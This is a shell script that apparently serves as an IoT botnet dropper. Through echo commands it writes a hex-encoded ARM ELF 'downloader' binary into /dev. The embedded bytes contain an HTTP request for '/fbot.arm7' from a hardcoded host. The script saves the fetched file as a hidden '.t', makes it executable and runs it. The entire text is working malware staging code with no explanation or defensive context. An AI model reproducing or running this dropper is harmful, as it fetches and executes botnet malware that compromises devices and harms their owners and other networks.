cd /dev
cp /bin/busybox downloader
cp /bin/busybox .t
echo -en "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x9c\x82\x00\x00\x34\x00\x00\x00\x84\x03\x00\x00\x02\x00\x00\x04\x34\x00\x20\x00\x04\x00\x28\x00\x07\x00\x06\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" > downloader
echo -en "\x00\x80\x00\x00\x2c\x03\x00\x00\x2c\x03\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\x2c\x03\x00\x00\x2c\x03\x01\x00\x2c\x03\x01\x00\x10\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x07\x00\x00\x00\x2c\x03\x00\x00\x2c\x03\x01\x00" >> downloader
echo -en "\x2c\x03\x01\x00\x00\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> downloader
echo -en "\x04\xe0\x2d\xe5\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x01\x00\xa0\xe3\x72\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x0c\x00\x9f\xe5\x67\x00\x00\xeb" >> downloader
echo -en "\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x1b\x01\x00\x00\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x04\x00\xa0\xe3\x5b\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5" >> downloader
echo -en "\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1\x03\x00\xa0\xe3\x50\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x04\xe0\x2d\xe5\x01\xc0\xa0\xe1\x02\x30\xa0\xe1\x00\x10\xa0\xe1\x04\xd0\x4d\xe2\x0c\x20\xa0\xe1" >> downloader
echo -en "\x0c\x00\x9f\xe5\x45\x00\x00\xeb\x04\xd0\x8d\xe2\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x19\x01\x00\x00\xf0\x40\x2d\xe9\xec\x30\x9f\xe5\x9c\xd0\x4d\xe2\x88\x30\x8d\xe5\x02\x30\xa0\xe3\xb4\x38\xcd\xe1\x02\x00\xa0\xe3\x05\x3a\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3" >> downloader
echo -en "\xb6\x38\xcd\xe1\xe7\xff\xff\xeb\x01\x00\x70\xe3\x00\x50\xa0\xe1\x01\x00\xa0\x03\xb9\xff\xff\x0b\x05\x00\xa0\xe1\x84\x10\x8d\xe2\x10\x20\xa0\xe3\xbd\xff\xff\xeb\x01\x00\x70\xe3\x02\x00\x80\x02\xb2\xff\xff\x0b\x05\x00\xa0\xe1\x94\x10\x9f\xe5\x1b\x20\xa0\xe3" >> downloader
echo -en "\xc2\xff\xff\xeb\x00\x00\x50\xe3\x01\x00\xa0\xd3\xab\xff\xff\xdb\x80\x70\x9f\xe5\x00\x40\xa0\xe3\x97\x60\x8d\xe2\x06\x10\xa0\xe1\x01\x20\xa0\xe3\x05\x00\xa0\xe1\xc3\xff\xff\xeb\x01\x00\x50\xe3\x01\x00\xa0\xe3\xa1\xff\xff\x1b\x97\x30\xdd\xe5\x04\x44\x83\xe1" >> downloader
echo -en "\x07\x00\x54\xe1\xf4\xff\xff\x1a\x04\x40\x8d\xe2\x04\x10\xa0\xe1\x80\x20\xa0\xe3\x05\x00\xa0\xe1\xb7\xff\xff\xeb\x00\x30\xa0\xe1\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x00\x00\x53\xe1\x04\x10\xa0\xe1\x01\x00\x00\xda\xa5\xff\xff\xeb\xf3\xff\xff\xea\x00\x00\xa0\xe3" >> downloader
echo -en "\x8e\xff\xff\xeb\x9c\xd0\x8d\xe2\xf0\x40\xbd\xe8\x1e\xff\x2f\xe1\x05\xce\xe3\x41\x10\x83\x00\x00\x0a\x0d\x0a\x0d\xbd\xff\xff\xea\x0d\xc0\xa0\xe1\xf0\x00\x2d\xe9\x00\x70\xa0\xe1\x01\x00\xa0\xe1\x02\x10\xa0\xe1\x03\x20\xa0\xe1\x78\x00\x9c\xe8\x00\x00\x00\xef" >> downloader
echo -en "\xf0\x00\xbd\xe8\x01\x0a\x70\xe3\x0e\xf0\xa0\x31\xff\xff\xff\xea\x04\xe0\x2d\xe5\x1c\x20\x9f\xe5\x00\x30\xa0\xe1\x02\x20\x9f\xe7\x06\x00\x00\xeb\x00\x30\x63\xe2\x02\x30\x80\xe7\x00\x00\xe0\xe3\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x54\x80\x00\x00\x00\x00\x00\x00" >> downloader
echo -en "\x0f\x0a\xe0\xe3\x1f\xf0\x40\xe2\x00\x00\xa0\xe1\x00\x00\xa0\xe1\x47\x45\x54\x20\x2f\x66\x62\x6f\x74\x2e\x61\x72\x6d\x37\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x13\x00\x00" >> downloader
echo -en "\x00\x61\x65\x61\x62\x69\x00\x01\x09\x00\x00\x00\x06\x02\x08\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x74\x62\x73\x73\x00\x2e\x67\x6f\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75" >> downloader
echo -en "\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xc0\x80\x00\x00\xc0\x00\x00\x00" >> downloader
echo -en "\x50\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x10\x83\x00\x00\x10\x03\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00" >> downloader
echo -en "\x08\x00\x00\x00\x03\x04\x00\x00\x2c\x03\x01\x00\x2c\x03\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x2c\x03\x01\x00\x2c\x03\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00" >> downloader
echo -en "\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x24\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x03\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" >> downloader
chmod 777 downloader
./downloader > .t
chmod 777 .t
./.t uchttpd